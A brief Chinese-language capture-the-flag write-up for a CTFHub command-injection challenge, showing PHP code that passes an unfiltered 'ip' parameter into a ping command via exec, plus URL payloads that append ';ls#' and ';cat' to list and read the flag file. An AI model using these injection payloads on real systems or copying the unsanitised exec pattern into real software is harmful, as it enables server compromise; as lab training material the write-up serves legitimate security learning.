RCE6-命令注入（通过`&`拼接`ls`查询文件命令）

一.题目链接：

https://www.ctfhub.com/#/skilltree

二.代码分析

//这段代码的大致意思是直接将输入的ip执行ping -c 4的命令，然后返回结果，没有任何过滤
//于是可以利用linux拼接命令行的方式在ping命令的后面通过ls查看文件,每个命令之间要加;或者&&或&进行分割，或者直接在输入框内直接输入进行分割
<?php

$res = FALSE;

if (isset($_GET['ip']) && $_GET['ip']) {
    $cmd = "ping -c 4 {$_GET['ip']}";
    exec($cmd, $res);
}

?>

三.开始解题

1.通过修改url,在后面拼接查询文件命令，得到不一样的php文件

/?ip=192.168.10.100;ls#

2.cat 文件，一开始界面社么也没有，F12查看代码发现被注释了

?ip=192.168.10.100;cat%2020112966130215.php#